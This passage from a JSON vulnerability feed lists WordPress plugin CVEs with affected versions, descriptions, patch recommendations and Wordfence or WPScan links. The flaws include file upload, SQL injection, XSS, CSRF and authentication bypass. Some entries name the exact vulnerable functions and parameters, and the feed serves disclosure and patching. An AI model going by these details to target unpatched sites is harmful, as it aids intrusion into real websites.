version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/qwery-multipurpose-business-wordpress-theme\\\/29678687\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/qwery-multipurpose-business-wordpress-theme\\\/29678687\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15a9718f-f877-4e33-8f7a-950791c4ca85?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15a9718f-f877-4e33-8f7a-950791c4ca85?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13448","slug":"trx_addons","versionImpact":"2.32.3","versionEndExcluding":"2.34.0","description":"The ThemeREX Addons plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'trx_addons_uploads_save_data' function in all versions up to, and including, 2.32.3. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.34.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/qwery-multipurpose-business-wordpress-theme\\\/29678687\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/qwery-multipurpose-business-wordpress-theme\\\/29678687\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c1372bd-821d-439c-9b11-dfa5f08dd0dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c1372bd-821d-439c-9b11-dfa5f08dd0dd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4248","slug":"give","versionImpact":"2.33.3","versionEndExcluding":"2.33.4","description":"The GiveWP plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.33.3. This is due to missing or incorrect nonce validation on the give_stripe_disconnect_connect_stripe_account function. This makes it possible for unauthenticated attackers to deactivate the plugin's stripe integration settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.33.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bff8dea-6971-47d4-bd2c-0821687033e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bff8dea-6971-47d4-bd2c-0821687033e5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/includes\\\/gateways\\\/stripe\\\/includes\\\/admin\\\/admin-actions.php?rev=2585755#L361\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/includes\\\/gateways\\\/stripe\\\/includes\\\/admin\\\/admin-actions.php?rev=2585755#L361\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2974851%40give%2Ftrunk&old=2973080%40give%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2974851%40give%2Ftrunk&old=2973080%40give%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4247","slug":"give","versionImpact":"2.33.3","versionEndExcluding":"2.33.4","description":"The GiveWP plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.33.3. This is due to missing or incorrect nonce validation on the give_sendwp_disconnect function. This makes it possible for unauthenticated attackers to deactivate the SendWP plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.33.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e32d9104-5a39-4455-b76a-e24ae787bdfd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e32d9104-5a39-4455-b76a-e24ae787bdfd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/includes\\\/admin\\\/misc-functions.php?rev=2772225#L333\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/includes\\\/admin\\\/misc-functions.php?rev=2772225#L333\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2974851%40give%2Ftrunk&old=2973080%40give%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2974851%40give%2Ftrunk&old=2973080%40give%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4246","slug":"give","versionImpact":"2.33.3","versionEndExcluding":"2.33.4","description":"The GiveWP plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.33.3. This is due to missing or incorrect nonce validation on the give_sendwp_remote_install_handler function. This makes it possible for unauthenticated attackers to install and activate the SendWP plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.33.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc5c511f-dc79-468b-a107-cdf50999faf8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc5c511f-dc79-468b-a107-cdf50999faf8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/includes\\\/admin\\\/misc-functions.php?rev=2772225#L258\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/includes\\\/admin\\\/misc-functions.php?rev=2772225#L258\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2974851%40give%2Ftrunk&old=2973080%40give%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2974851%40give%2Ftrunk&old=2973080%40give%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12850","slug":"database-backup","versionImpact":"2.32","versionEndExcluding":"2.33","description":"The Database Backup and check Tables Automated With Scheduler 2024 plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.32 via the database_backup_ajax_download() function. This makes it possible for authenticated attackers, with administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 2.33, or a newer patched version","refs":"[{\"url\":\"http:\\\/\\\/plugins.svn.wordpress.org\\\/database-backup\\\/tags\\\/2.32\\\/functions\\\/download.php\",\"name\":\"http:\\\/\\\/plugins.svn.wordpress.org\\\/database-backup\\\/tags\\\/2.32\\\/functions\\\/download.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212315\\\/database-backup\\\/trunk\\\/functions\\\/download.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212315\\\/database-backup\\\/trunk\\\/functions\\\/download.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b972626c-6374-4084-a0e1-1ea4a3062228?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b972626c-6374-4084-a0e1-1ea4a3062228?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13789","slug":"ravpage","versionImpact":"2.31","versionEndExcluding":"2.33","description":"The ravpage plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.31 via deserialization of untrusted input from the 'paramsv2' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"Update to version 2.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ravpage\\\/trunk\\\/ravpage.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ravpage\\\/trunk\\\/ravpage.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e0bcf70-2ffc-45c8-b63e-a8376b6cd22b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e0bcf70-2ffc-45c8-b63e-a8376b6cd22b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2250","slug":"reportattacks","versionImpact":"2.32","versionEndExcluding":"2.33","description":"The WordPress Report Brute Force Attacks and Login Protection ReportAttacks Plugins plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in all versions up to, and including, 2.32 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/reportattacks\\\/tags\\\/2.32\\\/includes\\\/list-tables\\\/class-reportattacks-list-table.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/reportattacks\\\/tags\\\/2.32\\\/includes\\\/list-tables\\\/class-reportattacks-list-table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3254851%40reportattacks&new=3254851%40reportattacks&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3254851%40reportattacks&new=3254851%40reportattacks&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602bf9b1-17a9-441a-b12d-15412df2deb4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602bf9b1-17a9-441a-b12d-15412df2deb4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1459","slug":"siteorigin-panels","versionImpact":"2.31.4","versionEndExcluding":"2.31.5","description":"The Page Builder by SiteOrigin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Embedded Video(PB) widget in all versions up to, and including, 2.31.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.31.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3247428%40siteorigin-panels&new=3247428%40siteorigin-panels&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3247428%40siteorigin-panels&new=3247428%40siteorigin-panels&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e14c12ef-0774-4459-9a2c-9a4b633a0efe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e14c12ef-0774-4459-9a2c-9a4b633a0efe?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12240","slug":"siteorigin-panels","versionImpact":"2.31.0","versionEndExcluding":"2.31.1","description":"The Page Builder by SiteOrigin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the row label parameter in all versions up to, and including, 2.31.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.31.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/siteorigin-panels\\\/tags\\\/2.31.0\\\/tpl\\\/metabox-panels.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/siteorigin-panels\\\/tags\\\/2.31.0\\\/tpl\\\/metabox-panels.php#L17\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abe8c6b0-b16b-4391-88b4-dca507c973fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abe8c6b0-b16b-4391-88b4-dca507c973fc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36840","slug":"mp-timetable","versionImpact":"2.3.8","versionEndExcluding":"2.3.9","description":"The Timetable and Event Schedule by MotoPress plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the wp_ajax_route_url() function called via a nopriv AJAX action in versions up to, and including, 2.3.8. This makes it possible for unauthenticated attackers to call that function and perform a wide variety of actions such as including random template, injecting malicious web scripts, and more.","recommendation":"Update to version 2.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/988d7b33-f985-4d22-a2db-3922002fcecb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/988d7b33-f985-4d22-a2db-3922002fcecb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2288592%40mp-timetable&new=2288592%40mp-timetable&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2288592%40mp-timetable&new=2288592%40mp-timetable&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6688","slug":"simple-payment","versionImpact":"2.3.8","versionEndExcluding":"2.3.9","description":"The Simple Payment plugin for WordPress is vulnerable to Authentication Bypass in versions 1.3.6 to 2.3.8. This is due to the plugin not properly verifying a user's identity prior to logging them in through the create_user() function. This makes it possible for unauthenticated attackers to log in as administrative users.","recommendation":"Update to version 2.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318371\\\/simple-payment\\\/tags\\\/2.3.9\\\/simple-payment-plugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318371\\\/simple-payment\\\/tags\\\/2.3.9\\\/simple-payment-plugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b4e2f87-e3ad-4f1b-b647-f5e5a49f691b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b4e2f87-e3ad-4f1b-b647-f5e5a49f691b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0060","slug":"responsive-gallery-grid","versionEndExcluding":"2.3.9","description":"The Responsive Gallery Grid WordPress plugin before 2.3.9 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be2fc859-3158-4f06-861d-382381a7551b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be2fc859-3158-4f06-861d-382381a7551b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13882","slug":"aiomatic-automatic-ai-content-writer","versionImpact":"2.3.8","versionEndExcluding":"2.3.9","description":"The Aiomatic - Automatic AI Content Writer & Editor, GPT-3 & GPT-4, ChatGPT ChatBot & AI Toolkit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'aiomatic_generate_featured_image' function in all versions up to, and including, 2.3.8. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/coderevolution.ro\\\/knowledge-base\\\/faq\\\/full-changelog-aiomatic-automatic-ai-content-writer-editor-gpt-3-gpt-4-chatgpt-chatbot-ai-toolkit\\\/\",\"name\":\"https:\\\/\\\/coderevolution.ro\\\/knowledge-base\\\/faq\\\/full-changelog-aiomatic-automatic-ai-content-writer-editor-gpt-3-gpt-4-chatgpt-chatbot-ai-toolkit\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7108df0d-771a-4404-b90d-8ac8bc572898?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7108df0d-771a-4404-b90d-8ac8bc572898?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7514","slug":"comments-import-export-woocommerce","versionImpact":"2.3.7","versionEndExcluding":"2.3.9","description":"The WordPress Comments Import & Export plugin for WordPress is vulnerable to to arbitrary file read due to insufficient file path validation during the comments import process, in versions up to, and including, 2.3.7. This makes it possible for authenticated attackers, with Author-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.\r\nThe issue was partially fixed in version 2.3.8 and fully fixed in 2.3.9","recommendation":"Update to version 2.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30a79974-ee61-4764-8864-89659b1848a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30a79974-ee61-4764-8864-89659b1848a4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/comments-import-export-woocommerce\\\/tags\\\/2.3.7\\\/includes\\\/importer\\\/class-hf_cmt_impexpcsv-import.php#L346\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/comments-import-export-woocommerce\\\/tags\\\/2.3.7\\\/includes\\\/importer\\\/class-hf_cmt_impexpcsv-import.php#L346\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3634","slug":"month-name-translation-benaceur","versionImpact":"2.3.7","versionEndExcluding":"2.3.8","description":"The month name translation benaceur WordPress plugin before 2.3.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76e000e0-314f-4e39-8871-68bf8cc95b22\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76e000e0-314f-4e39-8871-68bf8cc95b22\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0504","slug":"wp-politic","versionEndExcluding":"2.3.8","description":"The HT Politic WordPress plugin before 2.3.8 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b427841d-a3ad-4e3a-8964-baad90a9aedb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b427841d-a3ad-4e3a-8964-baad90a9aedb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1330","slug":"kadence-blocks-pro","versionImpact":"2.3.7","versionEndExcluding":"2.3.8","description":"The kadence-blocks-pro WordPress plugin before 2.3.8 does not prevent users with at least the contributor role using some of its shortcode's functionalities to leak arbitrary options from the database.","recommendation":"Update to version 2.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1988815b-7a53-4657-9b1c-1f83c9f9ccfd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1988815b-7a53-4657-9b1c-1f83c9f9ccfd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6711","slug":"event-tickets-with-ticket-scanner","versionImpact":"2.3.7","versionEndExcluding":"2.3.8","description":"The Event Tickets with Ticket Scanner WordPress plugin before 2.3.8 does not sanitise and escape some parameters, which could allow users with a role as low as admin to perform Cross-Site Scripting attacks","recommendation":"Update to version 2.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf431b81-2db9-4fcb-841c-9b51d1870bf8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf431b81-2db9-4fcb-841c-9b51d1870bf8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10516","slug":"swift-performance-lite","versionImpact":"2.3.7.1","versionEndExcluding":"2.3.7.2","description":"The Swift Performance Lite plugin for WordPress is vulnerable to Local PHP File Inclusion in all versions up to, and including, 2.3.7.1 via the 'ajaxify' function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 2.3.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/swift-performance-lite\\\/trunk\\\/includes\\\/classes\\\/class.ajax.php#L795\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/swift-performance-lite\\\/trunk\\\/includes\\\/classes\\\/class.ajax.php#L795\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/swift-performance-lite\\\/trunk\\\/includes\\\/classes\\\/class.ajax.php#L824\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/swift-performance-lite\\\/trunk\\\/includes\\\/classes\\\/class.ajax.php#L824\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201933\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201933\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4921f41a-a9b1-4ae2-a903-c14ed22dcc15?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4921f41a-a9b1-4ae2-a903-c14ed22dcc15?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0891","slug":"stagtools","versionEndExcluding":"2.3.7","description":"The StagTools WordPress plugin before 2.3.7 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/72397fee-9768-462b-933c-400181a5487c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/72397fee-9768-462b-933c-400181a5487c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13796","slug":"post-grid","versionImpact":"2.3.6","versionEndExcluding":"2.3.7","description":"The Post Grid and Gutenberg Blocks \u2013 ComboBlocks plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.3.6 via the \/wp-json\/post-grid\/v2\/get_users REST API This makes it possible for unauthenticated attackers to extract sensitive data including including emails and other user data.","recommendation":"Update to version 2.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/trunk\\\/includes\\\/blocks\\\/functions-rest.php?rev=3242718#L2055\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/trunk\\\/includes\\\/blocks\\\/functions-rest.php?rev=3242718#L2055\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3245187%40post-grid&new=3245187%40post-grid&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3245187%40post-grid&new=3245187%40post-grid&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0407223a-cd41-43d1-87b0-d6b83b57d4b3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0407223a-cd41-43d1-87b0-d6b83b57d4b3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4671","slug":"pixcodes","versionEndExcluding":"2.3.7","description":"The PixCodes WordPress plugin before 2.3.7 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14c83830-3207-4f92-b8f5-afd7cc93af88\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14c83830-3207-4f92-b8f5-afd7cc93af88\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13320","slug":"woocommerce-multi-currency","versionImpact":"2.3.6","versionEndExcluding":"2.3.7","description":"The CURCY - WooCommerce Multi Currency - Currency Switcher plugin for WordPress is vulnerable to SQL Injection via the 'wc_filter_price_meta[where]' parameter in all versions up to, and including, 2.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-multi-currency\\\/20948446\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-multi-currency\\\/20948446\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d359a5c-db11-416e-a329-c3ed67b1a925?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d359a5c-db11-416e-a329-c3ed67b1a925?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13816","slug":"aiomatic-automatic-ai-content-writer","versionImpact":"2.3.6","versionEndExcluding":"2.3.7","description":"The Aiomatic - Automatic AI Content Writer & Editor, GPT-3 & GPT-4, ChatGPT ChatBot & AI Toolkit plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability checks on multiple functions in all versions up to, and including, 2.3.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update and delete posts, list and delete batches, list assistant uploaded files, delete personas, delete forms, delete templates, and clear logs. The vulnerability was partially patched in version 2.3.5.","recommendation":"Update to version 2.3.7, or a newer patched 